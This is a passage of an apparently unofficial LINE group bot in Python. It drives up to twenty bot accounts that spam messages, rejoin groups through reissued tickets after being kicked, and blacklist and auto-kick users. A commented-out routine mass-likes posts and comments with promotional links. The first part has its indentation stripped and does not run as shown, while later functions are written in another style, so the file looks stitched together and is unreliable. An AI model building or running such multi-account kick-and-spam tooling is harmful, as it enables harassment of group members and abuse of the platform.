ki16.sendText(msg.to,(bctxt))
ki17.sendText(msg.to,(bctxt))
ki18.sendText(msg.to,(bctxt))
ki19.sendText(msg.to,(bctxt))
ki20.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
ki.sendText(msg.to,"Ping ")
ki2.sendText(msg.to,"Ping ")
ki3.sendText(msg.to,"Ping ")
ki4.sendText(msg.to,"Ping ")
ki5.sendText(msg.to,"Ping ")
ki6.sendText(msg.to,"Ping ")
ki7.sendText(msg.to,"Ping ")
ki8.sendText(msg.to,"Ping ")
ki9.sendText(msg.to,"Ping ")
ki10.sendText(msg.to,"Ping ")
ki11.sendText(msg.to,"Ping ")
ki12.sendText(msg.to,"Ping ")
ki13.sendText(msg.to,"Ping ")
ki14.sendText(msg.to,"Ping ")
ki15.sendText(msg.to,"Ping ")
ki16.sendText(msg.to,"Ping ")
ki17.sendText(msg.to,"Ping ")
ki18.sendText(msg.to,"Ping ")
ki19.sendText(msg.to,"Ping ??")
ki20.sendText(msg.to,"Ping ")
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
elif op.param3 in ki2mid:
if op.param2 in ki3mid:
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki3.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki3.updateGroup(G)
elif op.param3 in ki4mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki7mid:
if op.param2 in ki6mid:
G = ki6.getGroup(op.param1)
G.preventJoinByTicket = False
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(G)
else:
G = ki6.getGroup(op.param1)
ki6.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki6.updateGroup(G)
Ticket = ki6.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki6.updateGroup(G)
elif op.param3 in ki8mid:
if op.param2 in ki7mid:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
else:
G = ki7.getGroup(op.param1)
ki7.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
elif op.param3 in ki9mid:
if op.param2 in ki8mid:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
else:
G = ki8.getGroup(op.param1)
ki8.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
elif op.param3 in ki10mid:
if op.param2 in ki9mid:
G = ki9.getGroup(op.param1)
G.preventJoinByTicket = False
ki9.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(G)
else:
G = ki9.getGroup(op.param1)
ki9.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki9.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki9.updateGroup(G)
except:
pass
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendText(op.param1,"Hallo " + cl.getContact(op.param2).displayName + "\nWelcome To ☞ " + str(ginfo.name) + " ☜" + "\nBudayakan Cek Note\nDan Semoga Betah Disini ^_^")
cl.sendImageWithURL(op.param1,image)
print "MEMBER JOIN TO GROUP"
if op.type == 17:
if wait["joinkick"] == True:
if op.param2 in admin:
if op.param2 in Bots:
return
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
print "MEMBER JOIN KICK TO GROUP"
if op.type == 15:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
cl.sendText(op.param1,"Good Bye " + cl.getContact(op.param2).displayName + "\nSee You Next Time . . . (p′︵‵。) 🤗")
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
print "MEMBER HAS LEFT THE GROUP"
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2(now=None):
    """Return False when the current minute is a multiple of ten, else True.

    Used as a spin-wait predicate so work only happens on :00/:10/.../:50.

    :param now: optional datetime to test against (defaults to datetime.now());
        added for testability, backward-compatible with the zero-arg call.
    """
    now2 = now if now is not None else datetime.now()
    nowT = datetime.strftime(now2, "%M")
    # BUG FIX: the original sliced nowT[14:] on a 2-character minute string,
    # which is always "" and never matches, so the function always returned
    # True. Compare the whole minute string instead.
    return nowT not in ["10", "20", "30", "40", "50", "00"]
def nameUpdate():
    """Background worker: while wait["clock"] is enabled, refresh the bot's
    display name to wait["cName"] plus the current (HH:MM) timestamp.

    Runs forever; started below as a daemon thread. Relies on module-level
    globals `wait` (config dict) and `cl` (LINE client).
    """
    while True:
        try:
            if wait["clock"] == True:
                now2 = datetime.now()
                nowT = datetime.strftime(now2, "(%H:%M)")
                profile = cl.getProfile()
                profile.displayName = wait["cName"] + nowT
                cl.updateProfile(profile)
        except Exception:
            # Best-effort: a network/API hiccup must not kill the thread.
            pass
        # BUG FIX: sleep on every cycle. The original slept only inside the
        # `if` branch, so the loop busy-spun at 100% CPU whenever the clock
        # flag was off.
        time.sleep(600)
# Start the clock-in-display-name updater (nameUpdate) in the background.
thread2 = threading.Thread(target=nameUpdate)
# Daemon thread: it must not keep the interpreter alive at shutdown.
thread2.daemon = True
thread2.start()
#def autolike():
# for zx in range(0,50):
# hasil = cl.activity(limit=1000)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
# try:
# cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~cybertk")
# ki4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki4.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki5.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
# ki6.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
# ki6.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ [∆√ cувєя тк™ √∆]\n\nhttp://line.me/ti/p/~s.k.9.7\n\nRe̶y̶Pr̶o̶ᵃˢⁱˢᵗ\n\nhttp://line.me/ti/p/~s.k.9.7")
